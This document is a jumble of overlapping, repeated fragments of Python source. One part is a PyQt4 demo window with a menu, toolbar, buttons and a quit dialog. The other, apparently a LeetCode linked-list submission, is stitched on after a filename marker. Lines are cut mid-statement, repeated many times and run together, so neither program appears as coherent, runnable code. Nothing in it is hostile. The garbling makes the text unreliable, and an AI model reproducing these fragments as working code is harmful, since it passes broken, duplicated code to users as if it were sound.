status tip) set window icon ''' import os from os.path import", "QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) # set location of app", "self) # btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn = QtGui.QPushButton('Quit',", "QtGui.QMessageBox.question(self, 'Message', \"Are you sure to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply", "| QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self): qr", "QtGui.QPushButton('Button', self) # btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn =", "window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a <b>QWidget</b>", "= menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action to the menu in menubar #", "self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding", "# The event handling starts from this point if __name__ == '__main__': main()", "-*- ''' a window with menu bar and tool bar QAction with addAction", "application must create an application object #print sys.argv[1:] ex = Example1() sys.exit(app.exec_()) #", "300) # status bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center the window", "qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv)", "textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction 
= QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit", "binding the action to the menu in menubar # toolbar self.toolbar = QtGui.QToolBar('name')", "buttons btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0,", "toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2)", "exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File')", "QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a <b>QWidget</b> widget') # create buttons btn =", "self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) #", "self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) # set location of app windows", "exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) #", "QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') 
exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar() menubar.setNativeMenuBar(False)", "<b>QWidget</b> widget') # create buttons btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This is a", "# btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self)", "QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self):", "center(self): qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app =", "# window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a", "main(): app = QtGui.QApplication(sys.argv) # Every PyQt4 application must create an application object", "self).__init__() self.initUI() def initUI(self): # text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's", "== QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self): qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center()", "of app windows on screen and its size self.setWindowTitle('GUI Demo') # window icon", "self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu", "# QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a <b>QWidget</b> widget') # create buttons btn", "btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self) 
qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit)", "on screen and its size self.setWindowTitle('GUI Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip", "# Every PyQt4 application must create an application object #print sys.argv[1:] ex =", "create an application object #print sys.argv[1:] ex = Example1() sys.exit(app.exec_()) # The event", "window with menu bar and tool bar QAction with addAction for event handling(setting", "def center(self): qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app", "def closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are you sure to quit?\", QtGui.QMessageBox.Yes", "menubar's action exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar", "btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status", "= QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar # self.statusBar().showMessage('Ready') #", "location of app windows on screen and its size self.setWindowTitle('GUI Demo') # window", "closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are you sure to quit?\", QtGui.QMessageBox.Yes |", "QAction with addAction for event handling(setting hot keys,showing status tip) set window icon", "tip) set window icon ''' import os from os.path import join import sys", "self.setCentralWidget(textEdit) # menubar's action exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') 
exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready')", "is a <b>QWidget</b> widget') # create buttons btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This", "on screen self.center() self.show() def closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are you", "self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv) # Every", "self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv) # Every PyQt4 application must create an", "QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550,", "self.initUI() def initUI(self): # text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action", "= QtGui.QPushButton('Button', self) # btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn", "qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center", "menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action", "must create an application object #print sys.argv[1:] ex = Example1() sys.exit(app.exec_()) # The", "# self.setToolTip('This is a <b>QWidget</b> widget') # create buttons btn = QtGui.QPushButton('Button', self)", "window icon ''' import os from os.path import join import sys from PyQt4", "object #print sys.argv[1:] ex = Example1() sys.exit(app.exec_()) # The event 
handling starts from", "QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self): qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp)", "350) # set location of app windows on screen and its size self.setWindowTitle('GUI", "icon ''' import os from os.path import join import sys from PyQt4 import", "= join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI() def initUI(self): # text", "self.setGeometry(500, 300, 550, 350) # set location of app windows on screen and", "\"Are you sure to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes:", "status tip) set window icon ''' import os from os.path import join import", "= self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv) #", "# tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a <b>QWidget</b> widget') # create", "# create buttons btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This is a <b>QPushButton</b> widget')", "bar and tool bar QAction with addAction for event handling(setting hot keys,showing status", "# self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center the window on screen self.center() self.show()", "# center the window on screen self.center() self.show() def closeEvent(self, event): reply =", "# status bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center the window on", "os.path import join import sys from PyQt4 import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class", "screen and its size self.setWindowTitle('GUI Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip #", "size self.setWindowTitle('GUI Demo') # window icon 
self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) #", "# menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the", "utf-8 -*- ''' a window with menu bar and tool bar QAction with", "300) qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar #", "self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready')", "widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) #", "action exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar", "menubar # toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)", "menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action to the menu in menubar # toolbar", "import sys from PyQt4 import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self):", "def initUI(self): # text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction", "windows on screen and its size self.setWindowTitle('GUI Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path)) #", 
"quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def", "QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv) # Every PyQt4 application must", "QtGui.QApplication(sys.argv) # Every PyQt4 application must create an application object #print sys.argv[1:] ex", "to the menu in menubar # toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar)", "os from os.path import join import sys from PyQt4 import QtGui,QtCore icon_path =", "cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv) # Every PyQt4", "widget') # create buttons btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This is a <b>QPushButton</b>", "self.statusBar().showMessage('not Ready') # center the window on screen self.center() self.show() def closeEvent(self, event):", "class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI() def initUI(self): # text edit textEdit", "sys from PyQt4 import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1,", "qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar # self.statusBar().showMessage('Ready')", "to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore()", "fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action to the menu in menubar", "a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) 
btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100,", "bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center the window on screen self.center()", "if reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self): qr = self.frameGeometry() cp", "an application object #print sys.argv[1:] ex = Example1() sys.exit(app.exec_()) # The event handling", "import join import sys from PyQt4 import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow):", "#!/usr/bin/env python # -*- coding: utf-8 -*- ''' a window with menu bar", "screen self.center() self.show() def closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are you sure", "# -*- coding: utf-8 -*- ''' a window with menu bar and tool", "icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI() def initUI(self): #", "# toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction)", "300, 550, 350) # set location of app windows on screen and its", "'Message', \"Are you sure to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply ==", "def main(): app = QtGui.QApplication(sys.argv) # Every PyQt4 application must create an application", "text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction = QtGui.QAction('&Exit', self)", "from os.path import join import sys from PyQt4 import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png')", 
"menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action to the menu in", "= QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300,", "fileMenu.addAction(exitAction) # binding the action to the menu in menubar # toolbar self.toolbar", "set window icon ''' import os from os.path import join import sys from", "application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction)", "the menu in menubar # toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2", "menu in menubar # toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 =", "qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') #", "# self.statusBar().showMessage('not Ready') # center the window on screen self.center() self.show() def closeEvent(self,", "event.accept() else: event.ignore() def center(self): qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft())", "Ready') # center the window 
on screen self.center() self.show() def closeEvent(self, event): reply", "reply = QtGui.QMessageBox.question(self, 'Message', \"Are you sure to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No)", "qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv) # Every PyQt4 application must create", "app = QtGui.QApplication(sys.argv) # Every PyQt4 application must create an application object #print", "QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self): qr =", "btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300)", "self.show() def closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are you sure to quit?\",", "bar QAction with addAction for event handling(setting hot keys,showing status tip) set window", "action to the menu in menubar # toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction)" ]
[ "nextNode=None): self.val = value self.next = nextNode class MyLinkedList(object): def __init__(self): \"\"\" Initialize", "\"\"\" Append a node of value val to the last element of the", "linked list. If index equals to the length of linked list, the node", "curr = curr.next def addAtHead(self, val): \"\"\" Add a node of value val", "index < 0 or index >= self.size: return -1 counter = 0 curr", ":type val: int :rtype: void \"\"\" if self.size == 0 or index ==", "if self.size == 0 or index == 0: self.addAtHead(val) else: node = Node(val)", "self.size == 1 and self.head: self.head = None self.size -= 1 elif self.size", "curr = curr.next curr.next = node self.size += 1 def addAtIndex(self, index, val):", "the first element of the linked list. After the insertion, the new node", "will be instantiated and called as such: # obj = MyLinkedList() # param_1", "If index equals to the length of linked list, the node will be", "node in the linked list. If the index is invalid, return -1. :type", "not be inserted. :type index: int :type val: int :rtype: void \"\"\" if", "instantiated and called as such: # obj = MyLinkedList() # param_1 = obj.get(index)", "== index: return curr.val counter += 1 curr = curr.next def addAtHead(self, val):", "self.head = None self.size = 0 def get(self, index): \"\"\" Get the value", "-= 1 elif self.size > 1: counter = 0 prev = None next", "linked list, if the index is valid. :type index: int :rtype: void \"\"\"", "value val to the last element of the linked list. :type val: int", "the end of linked list. If index is greater than the length, the", "of linked list, the node will be appended to the end of linked", "appended to the end of linked list. If index is greater than the", "self.size: return -1 counter = 0 curr = self.head while curr: if counter", "nextNode class MyLinkedList(object): def __init__(self): \"\"\" Initialize your data structure here. 
\"\"\" self.head", "return else: curr = curr.next def deleteAtIndex(self, index): \"\"\" Delete the index-th node", "the length, the node will not be inserted. :type index: int :type val:", "such: # obj = MyLinkedList() # param_1 = obj.get(index) # obj.addAtHead(val) # obj.addAtTail(val)", "int \"\"\" if index < 0 or index >= self.size: return -1 counter", "the linked list. After the insertion, the new node will be the first", "val: int :rtype: void \"\"\" node = Node(val) if self.head: node.next = self.head", "a node of value val before the first element of the linked list.", "the first node of the linked list. :type val: int :rtype: void \"\"\"", "and self.head: self.head = None self.size -= 1 elif self.size > 1: counter", "self.size -= 1 elif self.size > 1: counter = 0 prev = None", "\"\"\" node = Node(val) if not self.head: self.head = node else: curr =", "curr: if counter == index-1: node.next = curr.next curr.next = node self.size +=", "while next: if counter == index: prev.next = next.next self.size -= 1 return", "if counter == index: return curr.val counter += 1 curr = curr.next def", "= None self.size -= 1 elif self.size > 1: counter = 0 prev", "next next = next.next counter += 1 # Your MyLinkedList object will be", "linked list, the node will be appended to the end of linked list.", "= self.head while curr: if counter == index-1: node.next = curr.next curr.next =", "self.size = 0 def get(self, index): \"\"\" Get the value of the index-th", "if index == 0 and self.size == 1 and self.head: self.head = None", "\"\"\" Initialize your data structure here. 
\"\"\" self.head = None self.size = 0", "= node self.size += 1 def addAtTail(self, val): \"\"\" Append a node of", "int :rtype: void \"\"\" node = Node(val) if not self.head: self.head = node", "curr.next: curr = curr.next curr.next = node self.size += 1 def addAtIndex(self, index,", "index: int :rtype: void \"\"\" curr = self.head if index == 0 and", "\"\"\" self.head = None self.size = 0 def get(self, index): \"\"\" Get the", "node of value val before the index-th node in the linked list. If", "obj = MyLinkedList() # param_1 = obj.get(index) # obj.addAtHead(val) # obj.addAtTail(val) # obj.addAtIndex(index,val)", "= nextNode class MyLinkedList(object): def __init__(self): \"\"\" Initialize your data structure here. \"\"\"", "inserted. :type index: int :type val: int :rtype: void \"\"\" if self.size ==", "value self.next = nextNode class MyLinkedList(object): def __init__(self): \"\"\" Initialize your data structure", "node.next = curr.next curr.next = node self.size += 1 return else: curr =", "counter = 0 prev = None next = self.head while next: if counter", "is valid. :type index: int :rtype: void \"\"\" curr = self.head if index", "0 curr = self.head while curr: if counter == index: return curr.val counter", "int :rtype: int \"\"\" if index < 0 or index >= self.size: return", "elif self.size > 1: counter = 0 prev = None next = self.head", "is greater than the length, the node will not be inserted. :type index:", "= 0 curr = self.head while curr: if counter == index: return curr.val", "self.head = node else: curr = self.head while curr.next: curr = curr.next curr.next", ":type index: int :rtype: void \"\"\" curr = self.head if index == 0", "counter == index: prev.next = next.next self.size -= 1 return else: prev =", "int :rtype: void \"\"\" node = Node(val) if self.head: node.next = self.head self.head", "== 0 and self.size == 1 and self.head: self.head = None self.size -=", "will not be inserted. 
:type index: int :type val: int :rtype: void \"\"\"", "= self.head while curr: if counter == index: return curr.val counter += 1", "val before the first element of the linked list. After the insertion, the", "\"\"\" Add a node of value val before the index-th node in the", "1 and self.head: self.head = None self.size -= 1 elif self.size > 1:", "the node will not be inserted. :type index: int :type val: int :rtype:", "<filename>python_submission/707.design-linked-list.199616840.notac.py class Node(object): def __init__(self, value, nextNode=None): self.val = value self.next = nextNode", "0 curr = self.head while curr: if counter == index-1: node.next = curr.next", "node will be the first node of the linked list. :type val: int", "curr = self.head while curr: if counter == index-1: node.next = curr.next curr.next", "the last element of the linked list. :type val: int :rtype: void \"\"\"", "\"\"\" if index < 0 or index >= self.size: return -1 counter =", "value, nextNode=None): self.val = value self.next = nextNode class MyLinkedList(object): def __init__(self): \"\"\"", "index-1: node.next = curr.next curr.next = node self.size += 1 return else: curr", "\"\"\" Add a node of value val before the first element of the", "class Node(object): def __init__(self, value, nextNode=None): self.val = value self.next = nextNode class", "index: prev.next = next.next self.size -= 1 return else: prev = next next", "addAtHead(self, val): \"\"\" Add a node of value val before the first element", "MyLinkedList object will be instantiated and called as such: # obj = MyLinkedList()", "if self.head: node.next = self.head self.head = node else: self.head = node self.size", "of the linked list. After the insertion, the new node will be the", "def __init__(self): \"\"\" Initialize your data structure here. \"\"\" self.head = None self.size", "index-th node in the linked list, if the index is valid. :type index:", "the index-th node in the linked list. 
If index equals to the length", "= Node(val) if not self.head: self.head = node else: curr = self.head while", "length of linked list, the node will be appended to the end of", "called as such: # obj = MyLinkedList() # param_1 = obj.get(index) # obj.addAtHead(val)", "counter = 0 curr = self.head while curr: if counter == index: return", "def addAtIndex(self, index, val): \"\"\" Add a node of value val before the", "as such: # obj = MyLinkedList() # param_1 = obj.get(index) # obj.addAtHead(val) #", "= value self.next = nextNode class MyLinkedList(object): def __init__(self): \"\"\" Initialize your data", "list. If index is greater than the length, the node will not be", "list. If the index is invalid, return -1. :type index: int :rtype: int", "index: int :type val: int :rtype: void \"\"\" if self.size == 0 or", "linked list. If index is greater than the length, the node will not", "\"\"\" curr = self.head if index == 0 and self.size == 1 and", "in the linked list, if the index is valid. :type index: int :rtype:", "else: curr = curr.next def deleteAtIndex(self, index): \"\"\" Delete the index-th node in", "def addAtTail(self, val): \"\"\" Append a node of value val to the last", "val): \"\"\" Add a node of value val before the first element of", "of the linked list. 
:type val: int :rtype: void \"\"\" node = Node(val)", "int :rtype: void \"\"\" curr = self.head if index == 0 and self.size", "= MyLinkedList() # param_1 = obj.get(index) # obj.addAtHead(val) # obj.addAtTail(val) # obj.addAtIndex(index,val) #", "addAtIndex(self, index, val): \"\"\" Add a node of value val before the index-th", "0 or index == 0: self.addAtHead(val) else: node = Node(val) counter = 0", "while curr: if counter == index-1: node.next = curr.next curr.next = node self.size", "self.head = None self.size -= 1 elif self.size > 1: counter = 0", "< 0 or index >= self.size: return -1 counter = 0 curr =", "curr.next curr.next = node self.size += 1 return else: curr = curr.next def", "= None next = self.head while next: if counter == index: prev.next =", "self.head: node.next = self.head self.head = node else: self.head = node self.size +=", "than the length, the node will not be inserted. :type index: int :type", "val: int :rtype: void \"\"\" node = Node(val) if not self.head: self.head =", "element of the linked list. :type val: int :rtype: void \"\"\" node =", "= self.head self.head = node else: self.head = node self.size += 1 def", ":rtype: void \"\"\" node = Node(val) if self.head: node.next = self.head self.head =", "self.val = value self.next = nextNode class MyLinkedList(object): def __init__(self): \"\"\" Initialize your", "counter == index-1: node.next = curr.next curr.next = node self.size += 1 return", "Node(val) if not self.head: self.head = node else: curr = self.head while curr.next:", "equals to the length of linked list, the node will be appended to", "and self.size == 1 and self.head: self.head = None self.size -= 1 elif", "be appended to the end of linked list. 
If index is greater than", "+= 1 def addAtTail(self, val): \"\"\" Append a node of value val to", "val: int :rtype: void \"\"\" if self.size == 0 or index == 0:", "+= 1 def addAtIndex(self, index, val): \"\"\" Add a node of value val", "next = self.head while next: if counter == index: prev.next = next.next self.size", ">= self.size: return -1 counter = 0 curr = self.head while curr: if", "= node else: curr = self.head while curr.next: curr = curr.next curr.next =", "next = next.next counter += 1 # Your MyLinkedList object will be instantiated", "== 0: self.addAtHead(val) else: node = Node(val) counter = 0 curr = self.head", "def addAtHead(self, val): \"\"\" Add a node of value val before the first", "node of the linked list. :type val: int :rtype: void \"\"\" node =", "greater than the length, the node will not be inserted. :type index: int", "0 def get(self, index): \"\"\" Get the value of the index-th node in", "counter = 0 curr = self.head while curr: if counter == index-1: node.next", "valid. :type index: int :rtype: void \"\"\" curr = self.head if index ==", "1 def addAtIndex(self, index, val): \"\"\" Add a node of value val before", "= 0 def get(self, index): \"\"\" Get the value of the index-th node", ":rtype: void \"\"\" curr = self.head if index == 0 and self.size ==", "Node(val) counter = 0 curr = self.head while curr: if counter == index-1:", "node = Node(val) counter = 0 curr = self.head while curr: if counter", "void \"\"\" if self.size == 0 or index == 0: self.addAtHead(val) else: node", "curr.next def addAtHead(self, val): \"\"\" Add a node of value val before the", "of value val to the last element of the linked list. :type val:", "1 # Your MyLinkedList object will be instantiated and called as such: #", "prev = next next = next.next counter += 1 # Your MyLinkedList object", "If index is greater than the length, the node will not be inserted.", "last element of the linked list. 
